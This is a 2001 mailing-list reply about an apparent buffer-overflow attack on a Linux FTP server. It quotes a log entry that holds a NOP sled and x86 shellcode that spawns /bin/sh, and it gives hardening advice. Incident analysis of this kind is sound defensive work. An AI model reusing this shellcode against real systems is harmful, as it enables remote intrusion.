Re: Linux ftpd

From: centipede (centipedat_private)
Date: Sat Jun 09 2001 - 09:25:41 PDT

Next message: Przemyslaw Frasunek: "Re: Linux ftpd"

Previous message: Sam Mingolelli: "Re: Linux ftpd"
In reply to: mrcbisat_private: "Linux ftpd"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Simple.   another intrusion from APNIC... the swamp...
It's a buffer overflow exploit they were trying to run on your ftp server.
Whether they succeeded or not I cannot say.
There's a lot to be done:
- D'ya really need those anonymous connections ?  If not, shut the door 
close.
- D'ya use the latest version of your server ?
- D'ya employ any packet filtering device ?  If you do, block the swamp 
out...
- Use TCP Wrapper to limit connections from known IPs. 

centipede.

mrcbisat_private wrote:

> I have a linux-box running slackware 7.1 with kernel 2.2.18 acting as
> office-server; we have an internet-connection in dial-up to an ISP near us.
> Today I was looking into log-files, I found, in /var/log/messages the
> following message:
> Jun  3 21:30:05 sassuolo ftpd[24355]: ANONYMOUS FTP LOGIN FROM
> 202.239.131.55 [2
> 02.239.131.55],
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> 
>> <90>
> 
> <90><90><90><90><90><90><90><90><90><90><90>1<C0>1<DB>1<C9><B0>F<CD><80>1<C
> 0>1
> <DB>C<89><D9>A<B0>?<CD><80><EB>k^1<C0>1<C9><8D>^^A<88>F^Df<B9><FF>^A<B0>'<C
> D>
> <80>1<C0><8D>^^A<B0>=<CD><80>1<C0>1<DB><8D>^^H<89>C^B1<C9><FE><C9>1<C0><8
> D>^^H
> <B0>^L<CD><80><FE><C9>u<F3>1<C0><88>F^I<8D>^^H<B0>=<CD><80><FE>^N<B0>0<FE
> 
>> <C8>
> 
> <88>F^D1<C0><88>F^G<89>v^H<89>F^L<89><F3><8D>N^H<8D>V^L<B0>^K<CD><80>1<C0>1
> <DB>
> <B0>^A<CD><80><E8><90><FF><FF><FF>0bin0sh1..11
> 
> 
> repeated twice within few minutes. I think it was an intrusion attempt. My
> linux-box is connected to the internet with dynamic-ip-address. Can
> someone help me ? 
> Best regards
> 
> 
> 						Marco Bisio
> 
> 
>

Next message: Przemyslaw Frasunek: "Re: Linux ftpd"
Previous message: Sam Mingolelli: "Re: Linux ftpd"
In reply to: mrcbisat_private: "Linux ftpd"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Jun 09 2001 - 09:47:31 PDT